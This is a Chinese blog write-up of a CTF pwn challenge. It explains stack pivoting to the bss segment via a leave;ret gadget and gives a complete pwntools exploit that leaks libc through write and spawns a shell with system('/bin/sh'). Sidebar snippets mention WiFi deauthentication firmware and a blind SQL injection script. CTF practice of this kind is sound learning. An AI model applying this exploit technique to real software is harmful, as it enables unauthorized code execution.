BUUCTF-[Black Watch 入群题]PWN

最新推荐文章于 2023-08-01 20:38:25 发布
最新推荐文章于 2023-08-01 20:38:25 发布
阅读量373 收藏
点赞数
分类专栏: CTF 文章标签: ctf pwn 栈迁移
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fzuim/article/details/115709326
版权

常规检查下来,发现可以进行栈溢出,但是允许操作的空间只有8个字节…

看下ida伪代码

在这里插入图片描述

可操作空间很小,只能覆盖到eip,正常思路是:泄露write的got表地址,然后通过libcsearch找出system和bin/sh的地址,再次构造栈溢出攻击。此题目栈溢出只能操作8字节,一般思路行不通。此时就用到另一个概念:栈迁移!!!

栈迁移的关键点在于esp,能把esp重新指向另外一块内存空间,即可成功。这题的另一块内存空间就是bss段。
利用到栈迁移,我们需要在原本栈的eip位置覆盖成 leave;ret这样的汇编代码。

原理:leave=>mov esp ebp;pop ebp,ebp我们覆盖成bss段地址,那么mov后esp就指向了bss段地址。ret=>pop eip;call eip,ret就是执行咯,此处有个关键点在于,指向的目标地址,要是该地址-4字节。为啥呢:mov esp ebp后执行了pop ebp,此时esp会+4,下一句ret 执行的是esp+4的地址,在这边相当于bss+4,所以传入的目标地址要是bss-4。

exp大法附上

#coding=utf8
from pwn import *
from LibcSearcher import*
context.log_level = 'debug'

# sh = process('./spwn')
sh = remote('node3.buuoj.cn', 27253)
elf = ELF('./spwn')

func_addr = 0x0804849B
main_addr = elf.symbols['main']
leave_ret_addr = 0x08048408 # ROPgadget --binary rop --only "leave|ret"
bss_addr = 0x0804A300

# 在read的bss端读入rop链
payload = p32(elf.plt['write']) + p32(main_addr) + p32(1) + p32(elf.got['write']) + p32(4)
sh.sendafter('name?', payload)

# 栈迁移原理:ebp覆盖成目标内存地址,leave;ret=>mov esp ebp;pop ebp;pop eip;call eip;
# esp指向bss段,这就是栈迁移
payload = 0x18 * 'a' + p32(bss_addr-4) + p32(leave_ret_addr)
sh.sendafter('say?', payload)

write_addr = u32(sh.recv(4))
print(hex(write_addr))

# 一定要用LibcSearcher
libc = LibcSearcher('write', write_addr)
libc_base = write_addr - libc.dump('write')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')

print('system[%s],binsh[%s]' % (hex(system_addr), hex(binsh_addr)))

payload = p32(system_addr) + p32(main_addr) + p32(binsh_addr)
sh.sendafter('name?', payload)

payload = 0x18 * 'a' + p32(bss_addr-4) + p32(leave_ret_addr)
sh.sendafter('say?', payload)

sh.interactive()
Fzuim
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF】[Black Watch 群题]PWN
m0_51251108的博客
12-27 390
BUUCTF】[Black Watch 群题]PWN 记录下刷题,方便自己以后回顾,写的很烂,还请见谅 本题要用迁移 先checksec,file和nc看下程序 32位,动态链接,无canary和pie 思路:vul_function()里最后的read能溢出,但位置太短,不够写rop,运用迁移跳转至跳转至上一个read,写rop链,ret2libc后就能拿到shell了 主要是如何迁移: leave ret相当于: leave => mov esp, ebp; pop ebp
PWN · 迁移】[BUUCTF][Black Watch 群题]PWN
Mr_Fmnwon的博客
08-01 371
进能够覆盖ebp和ret,很难不往迁移上想。 修改ebp和ret后我们可以将指针指向另一处地址addr,需要ebp修改为ebp-4和ret修改为leave;ret地址。这是触发迁移的基本过程。 查看整个代码发现没有后门函数。 2.泄露libc 没有system函数的使用,但是有write函数。我们可以通过write泄露write的真实地址,从而泄露libc的地址。进一步可以拿到system和str_bin_sh的地址。 3.组合流程① read大量数据,可以是 aaaa + write.pl
Web-12(45-48)-BUUCTF平台
~airrudder~
08-02 448
本篇内容 [SWPU2019]Web1 [极客大挑战 2019]HardSQL [WesternCTF2018]shrine [BJDCTF 2nd]假猪套天下第一 上一篇 | 目录 | 下一篇 [SWPU2019]Web1 [极客大挑战 2019]HardSQL [WesternCTF2018]shrine [BJDCTF 2nd]假猪套天下第一 ======...
[Black Watch 群题]PWN-迁移
个人笔记
04-20 360
细节详情参考:https://blog.csdn.net/mcmuyanga/article/details/109260008。buf溢出空间只有0x20-0x18=8字节无法构造rop,所以需要利用迁移技术,迁移到bss上构造rop。bss布局:(左边是第一泄露Libc构造帧,右边是第二次重写获取shell的帧)改变思路:由于此程序没有可直接ret利用的函数同时溢出空间很小,所以需要。迁移操作:构造好中ebp新位置。思路:ret2shellcode。迁移关键指令:leave。
BUUCTF--[Black Watch 群题]Web
qq_46263951的博客
07-24 946
登录时使用burp suite抓包发现是以json传的数据 进去之后我们发现单击这三个热点分别会有以下三种响应 因为id=1,所以这里是一个整形注这里使用的异或盲注
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。... ...每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
http,ftp,mail服务器架设为一体软件
05-28
首先,我们先来了解一下花生壳的到底有什么作用。因为ADSL每次拨号上网所获得的IP地址每次都是不同的,花生壳起到的作用就是方便用户访问我们的服务 器(只需要输域名便可),而不用每次都输IP地址那么麻烦(因为我们也不可能每次重新拨号上网后,又去告诉用户现在的服务器的IP地址什么)。<br><br>例如,我们的花生壳护照下有一个域名www.oray.net ,那么只要在电脑上用该护照登陆了花生壳客户端。当别人输www.oray.net的时候,会自动解析到那台电脑所在的网络的公网IP地址。<br><br>也就是说,具体的服务器,是要我们自己去设置完成的。而不同的上网方式,建立服务器的方式是不同的,下面介绍两种常见上网方法的服务器的建立。(这两个上网方法主要区别在于用来做服务器的计算机,能否得到公网的IP地址)。<br>
迁移学习(buuctf [Black Watch 群题])
像初雪一样自由洒落
03-14 982
i春秋的borrowstack是迁移和万能gadget的混合,,,然后writeup看的不是很明白,也没有很细的解析,所以,emmm,应该是自己迁移学的不是很好,只是知道大概的意思,但是还没有做过题,这次在看雪看到文章,就好好学一下,做到题啦!! 迁移,我觉得比较好理解,如果试过将调用一个函数过程好好自己试过的话,知道控制ebp,可以控制函数的去向,详细可以看看这篇图示:https://b...
[Black Watch 群题]Web
shinygod的博客
04-12 647
知识点:盲注 在这边抓个包 可以看到有个php文件 经过测试发现异或盲注可以 直接exp import time import re import requests import string url = "http://f32ba0ff-a985-43d9-8921-862260b1b16b.node4.buuoj.cn:81/backend/content_detail.php" flag = '' def payload(i, j): time.sleep(0.2) #
[Black Watch 群题]PWN
、moddemod
06-20 358
利用bss进行迁移 exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * from LibcSearcher import * context(log_level='debug') proc_name = './spwn' p = process(proc_name) # p = remote('node3.buuoj.cn', 29482) elf = ELF(proc_name) write_plt = elf.plt['wri.
[Black Watch 群题]PWN迁移
qq_39869547的博客
02-06 947
迁移主要解决溢出空间不足的问题, 前提条件知道欲迁移位置的地址。 from LibcSearcher import * from PwnContext.core import * binary = './spwn' debug_libc = './libc-2.23.so' elf = ELF(binary) libc = ELF(debug_libc) local = 1 if local ...
[BUUCTF-pwn]——[Black Watch 群题]PWN
Y_peak的博客
02-21 228
[BUUCTF-pwn]——[Black Watch 群题]PWN 题目地址: https://buuoj.cn/challenges#[Black Watch 群题]PWN 思路 由于可以利用的溢出空间不够, 利用给定的bss段, 利用劫持到bss段。进行操作。 下面的 -4操作是因为会有一个pop ebp的指令执行, 执行过后。会 +4 exploit from pwn import * from LibcSearcher import * elf = ELF("./spwn") p =
[Black Watch 群题]PWN 劫持的利用
半岛铁盒的博客
08-17 328
32位程序,开启了nx保护 没有system函数和‘/bin/sh’的字符串,这边需要我们自己去想办法构造system(‘/bin/sh’) 思路 第一次输的参数s,那边我们可以写很长的数据,我们可以将我们的rop链布置在那里, 接着执行第二次输,利用站劫持,把程序的执行流程劫持到第一次输的位置就可以了 站劫持利用 做劫持主要用到的是一个leave;ret指令,一般程序执行完成后都会调用leave;ret来还原现场 payload1=‘a’*0x18+p32(s-4)+p32(leave_r
BUU PWN (二)
playmaker的博客
02-07 823
BUU PWN (二) level0 from pwn import * #p=process('./level0') p=remote("node3.buuoj.cn","26684") p.recvline() payload='a'*0x80+'a'*8+p64(0x400596) p.sendline(payload) p.interactive() ciscn_2019_n_5 ret...
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值